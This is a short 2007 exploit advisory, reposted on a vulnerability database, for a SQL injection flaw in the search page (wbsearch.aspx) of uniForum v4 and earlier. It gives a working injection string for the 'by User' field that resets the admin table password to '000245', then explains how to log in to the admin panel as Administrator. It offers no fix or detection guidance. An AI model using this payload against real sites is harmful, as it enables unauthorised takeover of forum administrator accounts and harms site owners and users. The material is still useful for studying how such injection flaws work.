uniForum <= v4 (wbsearch.aspx) Remote SQL Injection Vulnerability

2007-01-25T00:00:00
ID SECURITYVULNS:DOC:15860
Type securityvulns
Reporter Securityvulns
Modified 2007-01-25T00:00:00

Description


Title : uniForum <= v4 (wbsearch.aspx) Remote SQL Injection Vulnerability

Author : ajann

Contact : :(

S.Page : ...

Vendor : http://uniforum.biz/

$$ : $99


[[SQL]]]---------------------------------------------------------

http://[target]/[path]//wbsearch.aspx (POST Method) [SQL]

Example:

//Fin the ->wbsearch.aspx Before, see "by User", it write ';update admin set Password='000245'--

Login Admin:http://www.xxx.com/[path]/wbadmlog.aspx Username: Administrator Password: 000245

[[/SQL]]

"""""""""""""""""""""

ajann,Turkey

...

Im not Hacker!